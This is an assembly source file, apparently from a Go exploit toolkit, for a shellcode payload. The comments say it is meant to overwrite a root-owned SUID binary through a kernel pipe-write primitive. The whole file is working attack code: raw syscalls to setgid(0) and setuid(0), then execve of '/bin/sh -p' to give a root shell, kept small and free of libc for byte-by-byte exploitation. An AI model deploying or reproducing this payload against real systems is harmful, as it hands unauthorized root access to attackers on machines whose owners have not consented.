// Source for the generated byte literal in ../elf_payloads.go.
//
// This is used as a pipe-primitive SUID overwrite payload. It intentionally
// avoids libc and dynamic loading so a partially overwritten root-owned SUID
// helper can become a small root shell trampoline. Keep it tiny: some
// CVE-specific primitives need one kernel trigger per byte.
//
// Regenerate with:
//   go generate ./pkg/pipe-primitive

.global _start

.section .text
_start:
	// setgid(0)
	xor %edi, %edi
	push $106
	pop %rax
	syscall

	// setuid(0)
	xor %edi, %edi
	push $105
	pop %rax
	syscall

	// execve("/bin/sh", ["/bin/sh", "-p"], nil)
	xor %edx, %edx
	mov $0x0068732f6e69622f, %rbx
	push %rbx
	mov %rsp, %rdi
	push %rdx
	xor %ebx, %ebx
	mov $0x702d, %bx
	push %rbx
	mov %rsp, %rbx
	push %rdx
	push %rbx
	push %rdi
	mov %rsp, %rsi
	push $59
	pop %rax
	syscall
